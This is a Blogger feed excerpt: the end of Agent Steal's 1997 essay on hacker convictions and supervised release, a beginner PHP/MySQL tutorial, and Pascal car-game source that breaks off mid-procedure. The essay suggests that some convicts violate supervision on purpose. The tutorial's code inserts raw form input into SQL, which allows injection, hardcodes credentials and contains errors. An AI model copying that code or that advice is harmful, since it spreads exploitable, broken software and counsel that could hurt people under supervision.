someone who used a car to get to and from a bank robbery to not ever drive&lt;br /&gt;
again. If a hacker is predisposed to hacking he's going to be able to do it&lt;br /&gt;
with or without restrictions. In reality many hackers don't even need a&lt;br /&gt;
computer to achieve their goals. As you probably know a phone and a little&lt;br /&gt;
social engineering go a long way.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
But with any luck you will be assigned a reasonable P.O. and you will stay&lt;br /&gt;
out of trouble. If you give your P.O. no cause to keep an eye on you, you&lt;br /&gt;
may find the reins loosening up. You may also be able to have your&lt;br /&gt;
Supervised Release terminated ea rly by the court. After a year or so, with&lt;br /&gt;
good cause, and all of your government debts paid, it might be plausible.&lt;br /&gt;
Hire an attorney, file a motion.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
For many convicts Supervised Release is simply too much like being in&lt;br /&gt;
prison. For those it is best to violate, go back to prison for a few&lt;br /&gt;
months, and hope the judge terminates their Supervised Release. Although&lt;br /&gt;
the judge may continue your supervis ion, he/she typically will not.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; N. SUMMARY&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
What a long strange trip it's been. I have a great deal of mixed emotions&lt;br /&gt;
about my whole ordeal. I can however, say that I HAVE benefitted from my&lt;br /&gt;
incarceration. However, it certainly was not on the behalf of how I was&lt;br /&gt;
handled by the government. No , despite their efforts to kick me when I was&lt;br /&gt;
down, use me, turn their backs after I had assisted them, and in general,&lt;br /&gt;
just violate my rights, I was still able to emerge better educated than&lt;br /&gt;
when I went in. But frankly, my release from prison was just in the nick of&lt;br /&gt;
time. The long term effects of incarceration and stress were creeping up on&lt;br /&gt;
me, and I could see prison conditions were worsening. It's hard to express&lt;br /&gt;
the poignancy of the situation but the majority of those incarcerated feel&lt;br /&gt;
that if drastic changes are not made America is due for some serious&lt;br /&gt;
turmoil, perhaps even a civil war.&lt;br /&gt;
Yes, the criminal justice system is that screwed up. The Nation's thirst&lt;br /&gt;
for vengeance on criminals is leading us into a vicious feedback loop of&lt;br /&gt;
crime and punishment, and once again crime. Quite simply, the system is not&lt;br /&gt;
working. My purpose in writing this article was not to send any kind of&lt;br /&gt;
message. I'm not telling you how not to get caught and I'm not telling you&lt;br /&gt;
to stop hacking. I wrote this simply because I feel l ike I owe it to&lt;br /&gt;
whomever might get use of it. For some strange reason I am oddly compelled&lt;br /&gt;
to tell you what happened to me. Perhaps this is some kind or therapy,&lt;br /&gt;
perhaps it's just my ego, perhaps I just want to help some poor 18-year-old&lt;br /&gt;
hacker who really doesn't know what he is getting himself in to. Whatever&lt;br /&gt;
the reason, I just sat down one day and started writing.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
If there is a central theme to this article it would be how ugly your world&lt;br /&gt;
can become. Once you get grabbed by the law, sucked into their vacuum, and&lt;br /&gt;
they shine the spotlight on you, there will be little you can do to protect&lt;br /&gt;
yourself. The vultures and predators will try to pick what they can off of&lt;br /&gt;
you. It's open season for the U.S. Attorneys, your attorney, other inmates,&lt;br /&gt;
and prison officials. You become fair game. Defending yourself from all of&lt;br /&gt;
these forces will require all of your wits, all of your resources, and&lt;br /&gt;
occasionally your fists.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Furthering the humiliation, the press, as a general rule, will not be&lt;br /&gt;
concerned with presenting the truth. They will print what suits them and&lt;br /&gt;
often omit many relevant facts. If you have read any of the 5 books I am&lt;br /&gt;
covered in you will no doubt have a rather jaded opinion of me. Let me&lt;br /&gt;
assure you that if you met me today you would quickly see that I am quite&lt;br /&gt;
likable and not the villain many (especially Jon Littman) have made me out&lt;br /&gt;
to be. You may not agree with how I lived my life, but you wouldn't have&lt;br /&gt;
any trouble understanding why I chose to live it that way. Granted I've&lt;br /&gt;
made my mistakes, growing up has been a long road for me. Nevertheless, I&lt;br /&gt;
have no shortage of good friends. Friends that I am immensely loyal to. But&lt;br /&gt;
if you believe everything y ou read you'd have the impression that Mitnick&lt;br /&gt;
is a vindictive loser, Poulsen a furtive stalker, and I a two faced rat.&lt;br /&gt;
All of those assessments would be incorrect.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
So much for first impressions. I just hope I was able to enlighten you and&lt;br /&gt;
in some way to help you make the right choice. Whether it's protecting&lt;br /&gt;
yourself from what could be a traumatic life altering experience, or&lt;br /&gt;
compelling you to focus your computer skills on other avenues, it's&lt;br /&gt;
important for you to know the program, the language, and the rules.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
See you in the movies&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Agent Steal&lt;br /&gt;
1997</description><link>http://programmelk.blogspot.com/2012/03/fed-hacking.html</link><author>noreply@blogger.com (Lahiru Dilranga Silva)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLtw2veAxXbSwY8i9ddCIxMudGQ6yEeAbjOF5ozg2vFHimrdemHm2DDl2t2UwstpVdKiMiY7RmGcOiKqarmR7XmJAX_mmdi5HFZyrX-68RntxsxsRpNGRu5P8rzMKX9_ParTkaxwBw4oI/s72-c/hack.jpg" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3391098358149587733.post-3499458597274464128</guid><pubDate>Fri, 02 Mar 2012 14:34:00 +0000</pubDate><atom:updated>2012-03-02T06:34:49.022-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Programming</category><title>Beginner's Guide To MySQL and PHP</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;img border="0" height="212" src="http://www.host1free.com/blog/wp-content/uploads/2010/05/php-mysql.gif" width="240" /&gt;&amp;nbsp;&lt;/div&gt;&lt;span style="font-family: verdana,TIMES,SANS-SERIF; font-size: x-small;"&gt;    We've assembled a series of thoughts and examples based upon my own  experience using Php 3.0 and MySql. Our goal is that it will aid any  beginners in jumping over the common obstacles that hinder progress at  the earliest stages of Php/MySql implementation.      &lt;p"&gt;Connecting to the database.&lt;/p"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: verdana,TIMES,SANS-SERIF; font-size: x-small;"&gt;    Connecting to the database involves the calling of MySql commands via  Php, which are embedded in an "HTML" page. However, instead of having the *.html extension (ex. Mywebpage.html), the php pages would end in the extension  *.php3 for Php3.0, or in the extension *.phtml, if you are using Php/FI 2.0.  (Note: For the remaining part of this document, the standards for Php 3.0 will be  used.)  &lt;/span&gt;&lt;span style="font-family: verdana,TIMES,SANS-SERIF; font-size: x-small;"&gt;  Before we begin to call commands, however, it is assumed that MySQL and  Php have been installed and configured on the server. (If this has not  been done, it would be wise to first install the latest versions, or ask  your provider if MySQL and Php are available on the server.)  &lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: verdana,TIMES,SANS-SERIF; font-size: x-small;"&gt;  An simple example of the connection process would be:  &lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: verdana,TIMES,SANS-SERIF; font-size: x-small;"&gt;    &lt;span style="color: #006699;"&gt;    &amp;lt;?&lt;br /&gt;
# declare some variables&lt;br /&gt;
$site = io.incluso.com; &lt;br /&gt;
$username = mannymoejack; &lt;br /&gt;
$password = doodad; &lt;br /&gt;
$dbName = incluso; &lt;br /&gt;
# end variable declaration&lt;br /&gt;
mysql_connect($site, $username, $password); &lt;br /&gt;
?&amp;gt;  &lt;/span&gt;  &lt;br /&gt;
That's it! You are now connected to the MySql database. Remember that  the MySQL database password is usually not the same as the account  password. It is also possible that your MySQL database doesn't even have  a password. It is strongly suggested that password protection is placed  on the database. Without it, it could be fairly (very) easy for someone  to enter it by simply executing basic Php commands.      &lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: verdana,TIMES,SANS-SERIF; font-size: x-small;"&gt;Now What?&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: verdana,TIMES,SANS-SERIF; font-size: x-small;"&gt;    You will probably want to execute commands on the database once the  connection has been made. Let's look at a couple of examples:  &lt;br /&gt;
&lt;br /&gt;
Let's use this as the example MySQL table:  &lt;/span&gt;&lt;span style="font-family: verdana,TIMES,SANS-SERIF; font-size: x-small;"&gt;  &lt;span style="color: #006699;"&gt;  Create table rocketships (  model VARCHAR (25),  year DATE,  seating INT,  color VARCHAR (10)  ); &lt;/span&gt;     &lt;/span&gt;&lt;br /&gt;
&lt;div class="subhead"&gt;&lt;span style="font-family: verdana,TIMES,SANS-SERIF; font-size: x-small;"&gt;Insertion of Data&lt;/span&gt;&lt;/div&gt;&lt;span style="font-family: verdana,TIMES,SANS-SERIF; font-size: x-small;"&gt;    Before inserting data into the rocketships table, the table must first  be created within the MySQL database. If you are unfamiliar with the  necessary steps, consult Section 7.6 of the MySQL documentation.  &lt;br /&gt;
&lt;br /&gt;
Let's add a new rocket to the table: (commands would be inserted where  one sees the above "#add commands here")  &lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #006699;"&gt;MYSQL($dbName,"INSERT INTO rocketships  VALUES('X-Wing', '1998-09-14', '6', 'blue')");&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Important: When inserting data into the table, the number of variables  inserted into the table must match exactly with the actual number of columns  within the table. If it is not exact, the data will not be inserted.  &lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: verdana,TIMES,SANS-SERIF; font-size: x-small;"&gt;Data Mining&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: verdana,TIMES,SANS-SERIF; font-size: x-small;"&gt;    Assuming the insertion went okay, let's find that data within the  database, inserting the following commands within the script:  &lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #006699;"&gt;    &amp;lt;?&lt;br /&gt;
$result = mysql($dbName, "SELECT * from rocketships where (color =  'blue' &amp;amp;&amp;amp; seating = '6')"); &lt;br /&gt;
# array holding all rows found within the table  &lt;br /&gt;
&lt;br /&gt;
$num = mysql_numrows($result); &lt;br /&gt;
# the actual number of rows held in the array $result. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
$model = mysql_result($result,$i,"model");&lt;br /&gt;
$color = mysql_result($result,$i,"color");&lt;br /&gt;
$seating = mysql_result($result,$i,"seating");&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
print "The model is called: $model.&amp;lt;BR&amp;gt;&amp;lt;BR&amp;gt;";&lt;br /&gt;
print "The color is: $color. &amp;lt;BR&amp;gt;&amp;lt;BR&amp;gt;";&lt;br /&gt;
print "The rocket seats: $seating. &amp;lt;BR&amp;gt;&amp;lt;BR&amp;gt;";&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
?&amp;gt; &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Output: &lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #006699;"&gt;The model is called X-Wing. &lt;br /&gt;
&lt;br /&gt;
The color is blue. &lt;br /&gt;
&lt;br /&gt;
The rocket seats 6. &lt;br /&gt;
&lt;/span&gt;    Note: The above script assumes that there is only one rocket within the  table colored blue and seating 6. If there is more than one rocket having  these characteristics, the script will display the first rocket found within  the table.  &lt;br /&gt;
&lt;br /&gt;
Also, note within the select statement that color and seating are NOT  variables. Rather, these are the actual names of the columns. Therefore, do not  place $ before the names!  &lt;br /&gt;
&lt;br /&gt;
Assuming there are a number of rockets having these characteristics,  let's find them all and print them all out.  &lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #006699;"&gt;  &amp;lt;?&lt;br /&gt;
$result = mysql($dbName, "SELECT * from rocketships where (color =  'blue' &amp;amp;&amp;amp; seating = '6')");&lt;br /&gt;
# array holding all rows found within the table&lt;br /&gt;
&lt;br /&gt;
$num = mysql_numrows($result); &lt;br /&gt;
# the actual number of rows held in the array $result. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
$ i = 0; &lt;br /&gt;
while ($i &amp;lt; $num) : &lt;br /&gt;
&lt;br /&gt;
$model = mysql_result($result,$i,"model");&lt;br /&gt;
$color = mysql_result($result,$i,"color");&lt;br /&gt;
$seating = mysql_result($result,$i,"seating");&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
print "Rocket number $num found:&amp;lt;BR&amp;gt;&amp;lt;BR&amp;gt;";&lt;br /&gt;
print "The model is called: $model. &amp;lt;BR&amp;gt;&amp;lt;BR&amp;gt;";&lt;br /&gt;
print "The color is: $color. &amp;lt;BR&amp;gt;&amp;lt;BR&amp;gt;"&lt;br /&gt;
print "The rocket seats: $seating. &amp;lt;BR&amp;gt;&amp;lt;BR&amp;gt;";&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
$i++; &lt;br /&gt;
&lt;br /&gt;
endwhile; &lt;br /&gt;
?&amp;gt; &lt;br /&gt;
&lt;/span&gt;  &lt;br /&gt;
Up until now, we have been looking at somewhat static uses of the MySQL database. But what if you want to allow the user to input data? This is  the subject of the next section, Forms and MySQL. &lt;/span&gt;&lt;div class="subhead"&gt;&lt;span style="font-family: verdana,TIMES,SANS-SERIF; font-size: x-small;"&gt;Variables: from a form to MySQL&lt;/span&gt;&lt;/div&gt;&lt;span style="font-family: verdana,TIMES,SANS-SERIF; font-size: x-small;"&gt;Many times, we do not  want to statically insert data into a MySql table. This could be easier done using telnet. We might want to use an HTML form to  allow a user to insert for example, their name and email address into a MySql  table. &lt;br /&gt;
&lt;br /&gt;
Let's use the following table: &lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #006699;"&gt; Create table addresses ( &lt;br /&gt;
&lt;br /&gt;
name VARCHAR (25), &lt;br /&gt;
email VARCHAR (25), &lt;br /&gt;
date_inserted  DATETIME&lt;br /&gt;
&lt;br /&gt;
); &lt;/span&gt; &lt;br /&gt;
&lt;span style="color: #006699;"&gt; &amp;lt;FORM ACTION="thanks.php3" METHOD="POST"&amp;lt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;INPUT TYPE="text" NAME="name" SIZE="25" MAXLENGTH="30" VALUE=""&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;INPUT TYPE="text" NAME="email" SIZE="25" MAXLENGTH="30" VALUE=""&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;INPUT TYPE="submit" VALUE="default value"&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/FORM&amp;gt;&lt;br /&gt;
&lt;/span&gt; &lt;br /&gt;
&lt;br /&gt;
A user would fill out the above form, entering their name and email  address. The name would be placed within the variable $name, and the email would be  placed within the variable $email. Upon clicking the submit button, the  information would be passed to the Php3 script called thanks.php3. &lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #006699;"&gt; # thanks.php3&lt;br /&gt;
&lt;br /&gt;
&amp;lt;?&lt;br /&gt;
&lt;br /&gt;
# declare some variables&lt;br /&gt;
&lt;br /&gt;
$site = io.incluso.com; &lt;br /&gt;
$username = mannymoejack; &lt;br /&gt;
$password = doodad; &lt;br /&gt;
$dbName = incluso; &lt;br /&gt;
mysql_connect($site, $username, $password); &lt;br /&gt;
&lt;br /&gt;
MYSQL($dbName,"INSERT INTO userinfo VALUES('$name', '$address', NULL)"); &lt;br /&gt;
&lt;br /&gt;
print "Your data has been added to the database. Please click &amp;lt;A HREF  = \"http://www.314interactive.com/io/\"&amp;gt;here&amp;lt;/A&amp;gt; to return to  ionline."; &lt;br /&gt;
&lt;br /&gt;
mysql_close();&lt;br /&gt;
# this closes the database connection&lt;br /&gt;
&lt;br /&gt;
?&amp;gt;&lt;/span&gt; &lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: verdana,TIMES,SANS-SERIF; font-size: x-small;"&gt;Important  Notes:&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: verdana,TIMES,SANS-SERIF; font-size: x-small;"&gt;&lt;br /&gt;
&lt;li&gt; Why was the word  NULL used, instead of a variable? &lt;br /&gt;
Because the DATETIME datatype , when used in conjunction with NULL,  automatically inserts the current date and time into the database.  &lt;/li&gt;&lt;br /&gt;
&lt;li&gt; Notice the backslashes before the " marks. The " marks are   special characters for Php, and must be noted by the backslash, or an  error   will occur.   Two Quick Tips:&lt;br /&gt;
&lt;ol&gt;&lt;li&gt; Watch the extensions! &lt;br /&gt;
Sometimes, Internet providers have installed both versions 2.0 and 3.0  of Php on the server, for reasons of convenience to users who have  implemented Php 2.0 in the past, and have not yet upgraded to the recent  version. Therefore, if you are using commands which were found in the  3.0 manual, make sure the extensions of the pages end in *.php3. Those  ending in *.phtml will only use the 2.0 parser, of which many 3.0  commands are not found! &lt;br /&gt;
&lt;br /&gt;
&lt;/li&gt;
&lt;li&gt; The addslashes() and stripslashes() function. &lt;br /&gt;
Certain characters are considered special within Php, and special  consideration must be taken when attempting to pass them as variables  within a Php script. For example, if I attempt to insert the following  data into a MySQL database: &lt;br /&gt;
Ciao m'a'r'e'&lt;br /&gt;
It will seem as if the data has been inserted, as there will be no  error. However, that data has not been passed!&lt;/li&gt;
&lt;/ol&gt;There are two choices to remedy the situation:&lt;ol&gt;&lt;li&gt; Define the MAGIC_QUOTES variable within the configuration file. &lt;/li&gt;
&lt;li&gt;Use the addslashes() function.&lt;/li&gt;
&lt;/ol&gt;Ex. &lt;br /&gt;
Let's assume the following data has been passed via a form: &lt;br /&gt;
&lt;span style="color: #006699;"&gt;$property = Alessia's house&lt;br /&gt;
$where = Italy&lt;/span&gt; &lt;br /&gt;
&lt;br /&gt;
Before the Insert statement is called, $property must undergo the  addslashes()   function. &lt;br /&gt;
&lt;span style="color: #006699;"&gt;$property = addslashes($property);&lt;/span&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
effectively rendering $property = Alessia\'s house. &lt;br /&gt;
&lt;br /&gt;
Furthermore, when later calling that data from the database, the   stripslashes() function must be called. &lt;br /&gt;
&lt;span style="color: #006699;"&gt;$property = stripslashes($property);&lt;/span&gt; &lt;br /&gt;
effectively rendering $property to again be Alessia's house. &lt;br /&gt;
&lt;br /&gt;
That's it for now. Next issue, I will continue to look at more  complicated   aspects of the insert and select commands. Hope to see you there. &lt;/li&gt;&lt;br /&gt;
&lt;/span&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;</description><link>http://programmelk.blogspot.com/2012/03/beginners-guide-to-mysql-and-php.html</link><author>noreply@blogger.com (Lahiru Dilranga Silva)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3391098358149587733.post-1156537599611041021</guid><pubDate>Fri, 02 Mar 2012 02:03:00 +0000</pubDate><atom:updated>2012-03-02T06:47:11.980-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Programming</category><title>How To Create Car Game -  ( Source Code Only - Pascal )</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;img border="0" height="214" src="http://mywatchers.com/chicago%20personal%20injury%20lawyer/chicago%20personal%20injury%20lawyer/Fun%20Pics/create%20a%20ride.jpg" width="320" /&gt;&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Program : A car game. You have to drive the car in such a way that you dont strike a barrier on the road. &lt;/div&gt;--------------------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
Description: A car game. You have to drive the car in such a way that you dont strike a barrier on the road. &lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
program hero; &lt;br /&gt;
uses graph,crt; &lt;br /&gt;
const dir='c:\tp\bgi'; &lt;br /&gt;
var x1,x2,x3,driver,mode,moder,left1,left2,right1,right2:integer; &lt;br /&gt;
y1,y2,y3,lan1,lan2,chan,s1,s2,s3,s4,r1,r2:integer; &lt;br /&gt;
c,r,menu:char; &lt;br /&gt;
left,right,crash:boolean; &lt;br /&gt;
&lt;br /&gt;
Procedure sides1(x,y,a,b,c:integer); &lt;br /&gt;
Begin &lt;br /&gt;
If c mod 2 =0 then &lt;br /&gt;
Begin &lt;br /&gt;
setcolor(red); &lt;br /&gt;
rectangle(x,y,a,b); &lt;br /&gt;
setfillstyle(1,red); &lt;br /&gt;
floodfill(x+2,b-5,red); &lt;br /&gt;
End &lt;br /&gt;
Else &lt;br /&gt;
Begin &lt;br /&gt;
setcolor(white); &lt;br /&gt;
rectangle(x,y,a,b); &lt;br /&gt;
setfillstyle(1,white); &lt;br /&gt;
floodfill(x+2,b-5,white); &lt;br /&gt;
End; &lt;br /&gt;
End; &lt;br /&gt;
&lt;br /&gt;
Procedure sides2(x,y,a,b,c:integer); &lt;br /&gt;
Begin &lt;br /&gt;
If c mod 2 =0 then &lt;br /&gt;
Begin &lt;br /&gt;
setcolor(white); &lt;br /&gt;
rectangle(x,y,a,b); &lt;br /&gt;
setfillstyle(1,white); &lt;br /&gt;
floodfill(x+2,b-5,white); &lt;br /&gt;
End &lt;br /&gt;
Else &lt;br /&gt;
Begin &lt;br /&gt;
setcolor(red); &lt;br /&gt;
rectangle(x,y,a,b); &lt;br /&gt;
setfillstyle(1,red); &lt;br /&gt;
floodfill(x+2,b-5,red); &lt;br /&gt;
End; &lt;br /&gt;
End; &lt;br /&gt;
&lt;br /&gt;
procedure lane1(d,e,f:integer); &lt;br /&gt;
var a1,a2:integer; &lt;br /&gt;
Begin &lt;br /&gt;
a1:=315; &lt;br /&gt;
a2:=325; &lt;br /&gt;
if f mod 2 = 0 then &lt;br /&gt;
Begin &lt;br /&gt;
setcolor(white); &lt;br /&gt;
rectangle(a1,d,a2,e); &lt;br /&gt;
setfillstyle(1,white); &lt;br /&gt;
floodfill(317,e-5,white); &lt;br /&gt;
End &lt;br /&gt;
else &lt;br /&gt;
Begin &lt;br /&gt;
setcolor(black); &lt;br /&gt;
rectangle(a1,d,a2,e); &lt;br /&gt;
setfillstyle(1,black); &lt;br /&gt;
floodfill(317,e-5,black); &lt;br /&gt;
End; &lt;br /&gt;
end; &lt;br /&gt;
procedure lane2(d,e,f:integer); &lt;br /&gt;
var a1,a2:integer; &lt;br /&gt;
Begin &lt;br /&gt;
a1:=315; &lt;br /&gt;
a2:=325; &lt;br /&gt;
if f mod 2 = 0 then &lt;br /&gt;
Begin &lt;br /&gt;
setcolor(black); &lt;br /&gt;
rectangle(a1,d,a2,e); &lt;br /&gt;
setfillstyle(1,black); &lt;br /&gt;
floodfill(317,e-5,black); &lt;br /&gt;
End &lt;br /&gt;
else &lt;br /&gt;
Begin &lt;br /&gt;
setcolor(white); &lt;br /&gt;
rectangle(a1,d,a2,e); &lt;br /&gt;
setfillstyle(1,white); &lt;br /&gt;
floodfill(317,e-5,white); &lt;br /&gt;
End; &lt;br /&gt;
End; &lt;br /&gt;
&lt;br /&gt;
procedure rukawat1(a:integer); &lt;br /&gt;
&lt;br /&gt;
begin &lt;br /&gt;
setfillstyle(1,7); &lt;br /&gt;
floodfill(220,a-5,7); &lt;br /&gt;
end; &lt;br /&gt;
&lt;br /&gt;
procedure rukawat2(a:integer); &lt;br /&gt;
&lt;br /&gt;
begin &lt;br /&gt;
setfillstyle(1,black); &lt;br /&gt;
floodfill(220,a-5,black); &lt;br /&gt;
end; &lt;br /&gt;
&lt;br /&gt;
procedure rukawat3(a:integer); &lt;br /&gt;
&lt;br /&gt;
begin &lt;br /&gt;
setfillstyle(1,7); &lt;br /&gt;
floodfill(420,a-5,7); &lt;br /&gt;
end; &lt;br /&gt;
&lt;br /&gt;
procedure rukawat4(a:integer); &lt;br /&gt;
&lt;br /&gt;
begin &lt;br /&gt;
setfillstyle(1,black); &lt;br /&gt;
floodfill(420,a-5,black); &lt;br /&gt;
end; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Procedure obst1; &lt;br /&gt;
Begin &lt;br /&gt;
setcolor(7); &lt;br /&gt;
rectangle(s1,r1,s2,r2); &lt;br /&gt;
rukawat1(r2); &lt;br /&gt;
delay(200); &lt;br /&gt;
rectangle(s1,r1,s2,r2); &lt;br /&gt;
rukawat2(r2); &lt;br /&gt;
End; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Procedure obst2; &lt;br /&gt;
Begin &lt;br /&gt;
setcolor(7); &lt;br /&gt;
rectangle(s3,r1,s4,r2); &lt;br /&gt;
rukawat3(r2); &lt;br /&gt;
delay(200); &lt;br /&gt;
rectangle(s3,r1,s4,r2); &lt;br /&gt;
rukawat4(r2); &lt;br /&gt;
End; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
procedure car(x,y:integer); &lt;br /&gt;
begin &lt;br /&gt;
setcolor(white); &lt;br /&gt;
line(x,y,x+50,y); {horizontal line} &lt;br /&gt;
line(x,y,x-10,y+10); {left intersecting line} &lt;br /&gt;
line(x+50,y,x+60,y+10); {right intersecting line} &lt;br /&gt;
line(x-10,y+10,x-10,y+30); {left st line} &lt;br /&gt;
line(x+60,y+10,x+60,y+30); {right st line} &lt;br /&gt;
line(x-10,y+30,x+60,y+30); {end of bonnet} &lt;br /&gt;
setfillstyle(1,blue); &lt;br /&gt;
floodfill(x+20,y+20,white); &lt;br /&gt;
rectangle(x+60,y+30,x+70,y+35); {right side view mirror} &lt;br /&gt;
setfillstyle(1,7); &lt;br /&gt;
floodfill(x+65,y+33,white); &lt;br /&gt;
rectangle(x-20,y+35,x-10,y+30); {left side view mirror} &lt;br /&gt;
setfillstyle(1,7); &lt;br /&gt;
floodfill(x-15,y+33,white); &lt;br /&gt;
line(x-10,y+30,x-10,y+100); {body side left} &lt;br /&gt;
line(x+60,y+30,x+60,y+100); {body side right} &lt;br /&gt;
line(x-10,y+30,x,y+45); {wind screen left} &lt;br /&gt;
line(x+60,y+30,x+50,y+45); {wind screen right} &lt;br /&gt;
rectangle(x,y+45,x+50,y+80); {main roof} &lt;br /&gt;
setfillstyle(1,blue); &lt;br /&gt;
floodfill(x+2,y+50,white); &lt;br /&gt;
line(x+20,y+30,x,y+35 ); {left wiper} &lt;br /&gt;
line(x+50,y+30,x+30,y+35); {right wiper} &lt;br /&gt;
rectangle(x+10,y+50,x+40,y+60); {sunroof} &lt;br /&gt;
setfillstyle(1,8); &lt;br /&gt;
floodfill(x+20,y+55,white); &lt;br /&gt;
line(x,y+60,x-10,y+60); {left door} &lt;br /&gt;
line(x+50,y+60,x+60,y+60); {right door} &lt;br /&gt;
line(x,y+80,x-10,y+100); {roof to body side left} &lt;br /&gt;
line(x+50,y+80,x+60,y+100); {roof to body side right} &lt;br /&gt;
line(x-10,y+100,x+60,y+100); {back wind screen} &lt;br /&gt;
rectangle(x-10,y+100,x+60,y+115); &lt;br /&gt;
setfillstyle(1,blue); &lt;br /&gt;
floodfill(x+20,y+110,white); &lt;br /&gt;
line(x,y+100,x+20,y+87); {back windscreen wiper} &lt;br /&gt;
rectangle(x-20,y+115,x+70,y+130); {racing car's special raised trunk} &lt;br /&gt;
setfillstyle(1,blue); &lt;br /&gt;
floodfill(x,y+120,white); &lt;br /&gt;
line(x-10,y+122,x+60,y+122); {racing car's (back) trunk horizontaly 1 } &lt;br /&gt;
end; &lt;br /&gt;
&lt;br /&gt;
procedure car2(x,y:integer); &lt;br /&gt;
begin &lt;br /&gt;
setcolor(black); &lt;br /&gt;
line(x,y,x+50,y); {horizontal line} &lt;br /&gt;
line(x,y,x-10,y+10); {left intersecting line} &lt;br /&gt;
line(x+50,y,x+60,y+10); {right intersecting line} &lt;br /&gt;
line(x-10,y+10,x-10,y+30); {left st line} &lt;br /&gt;
line(x+60,y+10,x+60,y+30); {right st line} &lt;br /&gt;
line(x-10,y+30,x+60,y+30); {end of bonnet} &lt;br /&gt;
setfillstyle(1,black); &lt;br /&gt;
floodfill(x+20,y+20,black); &lt;br /&gt;
rectangle(x+60,y+30,x+70,y+35); {right side view mirror} &lt;br /&gt;
setfillstyle(1,black); &lt;br /&gt;
floodfill(x+65,y+33,black); &lt;br /&gt;
rectangle(x-20,y+35,x-10,y+30); {left side view mirror} &lt;br /&gt;
setfillstyle(1,black); &lt;br /&gt;
floodfill(x-15,y+33,black); &lt;br /&gt;
line(x-10,y+30,x-10,y+100); {body side left} &lt;br /&gt;
line(x+60,y+30,x+60,y+100); {body side right} &lt;br /&gt;
line(x-10,y+30,x,y+45); {wind screen left} &lt;br /&gt;
line(x+60,y+30,x+50,y+45); {wind screen right} &lt;br /&gt;
rectangle(x,y+45,x+50,y+80); {main roof} &lt;br /&gt;
setfillstyle(1,black); &lt;br /&gt;
floodfill(x+2,y+50,black); &lt;br /&gt;
line(x+20,y+30,x,y+35 ); {left wiper} &lt;br /&gt;
line(x+50,y+30,x+30,y+35); {right wiper} &lt;br /&gt;
rectangle(x+10,y+50,x+40,y+60); {sunroof} &lt;br /&gt;
line(x,y+60,x-10,y+60); {left door} &lt;br /&gt;
line(x+50,y+60,x+60,y+60); {right door} &lt;br /&gt;
line(x,y+80,x-10,y+100); {roof to body side left} &lt;br /&gt;
line(x+50,y+80,x+60,y+100); {roof to body side right} &lt;br /&gt;
line(x-10,y+100,x+60,y+100); {back wind screen} &lt;br /&gt;
rectangle(x-10,y+100,x+60,y+115); &lt;br /&gt;
setfillstyle(1,black); &lt;br /&gt;
floodfill(x+20,y+110,black); &lt;br /&gt;
line(x,y+100,x+20,y+87); {back windscreen wiper} &lt;br /&gt;
rectangle(x-20,y+115,x+70,y+130); {racing car's special raised trunk} &lt;br /&gt;
setfillstyle(1,black); &lt;br /&gt;
floodfill(x,y+120,black); &lt;br /&gt;
line(x-10,y+122,x+60,y+122); {racing car's (back) trunk horizontaly 1} &lt;br /&gt;
end; &lt;br /&gt;
Procedure option; &lt;br /&gt;
Begin &lt;br /&gt;
while keypressed =true do &lt;br /&gt;
Begin &lt;br /&gt;
